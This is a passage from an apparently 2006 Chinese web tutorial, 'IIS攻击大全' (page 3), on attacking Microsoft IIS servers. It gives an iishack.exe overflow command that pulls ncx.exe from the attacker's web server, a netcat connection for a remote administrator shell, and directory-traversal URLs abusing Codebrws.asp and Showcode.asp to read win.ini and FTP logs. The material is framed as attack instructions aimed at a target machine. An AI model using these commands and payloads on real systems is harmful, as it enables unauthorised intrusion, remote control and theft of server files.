WEB开发网
开发学院网络安全黑客技术 IIS攻击大全 阅读

IIS攻击大全

 2006-11-05 20:30:39 来源:WEB开发网   
核心提示: c:》iishack.exe 《目标机》 80 《你的WEB服务器》/ncx.exe然后你就使用netcat来连接你要检测的服务器:c:》nc 《目标机》 80如果溢出点正确,你就可以看到目标机器的命令行提示,IIS攻击大全(3),并且是远程管理权限,Codebrws.asp & Show

c:》iishack.exe 《目标机》 80 《你的WEB服务器》/ncx.exe

然后你就使用netcat来连接你要检测的服务器:

c:》nc 《目标机》 80

如果溢出点正确,你就可以看到目标机器的命令行提示,并且是远程管理权限。Codebrws.asp & Showcode.asp 。Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序,但不是默认安装的,这个查看器是在管理员允许查看样例文件作为联系的情况下安装的。但是,这个查看器并没有很好地限制所访问的文件,远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容,但要注意以下几点:

1.Codebrws.asp 和 Showcode.asp默认情况下不安装。

2.漏洞仅允许查看文件内容。

3.这个漏洞不能绕过WINDOWS NT的ACL控制列表的限制。

4.只允许同一分区下的文件可以被查看(所以把IIS目录和WINNT分区安装是个不错的方案,这样也可能比较好的防止最新的IIS5.0的unicode漏洞).

5.攻击者需要知道请求的文件名。

例如你发现存在这个文件并符合上面的要求,你可以请求如下的命令:

http://www.目标机.com/iisamples/exair/howitworks/codebrws.asp?source=/

iisamples/exair/howitworks/codebrws.asp

你就可以查看到codebrws.asp的源代码了。

你也可以使用showcode.asp来查看文件:

http://www.目标机.com/msadc/samples/selector/showcode.asp?

source=/msadc/../../../../../winnt/win.ini

当然你也可以查看一些FTP信息来获得其他的目标管理员经常使用的机器,或许其他的机器的安全性比WEB服务器差,如:http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?

source=/msadc/Samples/../../../../../winnt/system32/logfiles/MSFTPSVC1/ex000517.log

上一页  1 2 3 4 5 6  下一页

Tags:IIS 攻击 大全

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接